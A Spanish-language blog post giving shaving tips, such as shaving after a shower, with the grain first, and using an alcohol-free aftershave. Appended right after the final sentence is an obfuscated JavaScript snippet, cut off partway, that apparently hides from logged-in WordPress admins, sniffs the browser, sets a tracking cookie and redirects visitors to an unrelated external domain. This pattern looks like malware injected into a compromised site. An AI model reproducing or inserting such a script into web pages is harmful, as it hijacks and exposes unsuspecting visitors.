Para conseguir un mejor afeitado, debéis seguir los siguientes consejos:

  • Recomiendo afeitarse después de la ducha, ya que el agua caliente y el vapor, abren los poros de la piel y ablanda el vello consiguiendo un mejor afeitado.
  • Durante el momento del afeitado, es importante mantener la piel mojada y aclararla con agua caliente. Una vez terminado, utiliza agua fría para que el poro se cierre.
  • La dirección más efectiva en la que debe utilizarse la cuchilla, es contra de la dirección de crecimiento del vello, porque así conseguirás eliminar el vello de una forma más limpia. Pero siempre con mucho cuidado, ya que hay más probabilidad de cortes. Por lo que, recomiendo primero comenzar a afeitar a favor del crecimiento del vello y afeitarse en contra, sólo en aquellas zonas que sea necesario.
  • Posteriormente, hay que aplicar un after-sahve preferiblemente sin alcohol, porque la piel estará irritada y es probable que escueza al aplicarlo.
  • Y finalmente, puedes utilizar tu tratamiento diario habitual como una crema hidratante, anti-arrugas, etc.

El afeitado, es un proceso muy delicado del hombre y por ello, es importante hacerlo con mucho cuidado. ¡Tu piel lo agradecerá! 😉 var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone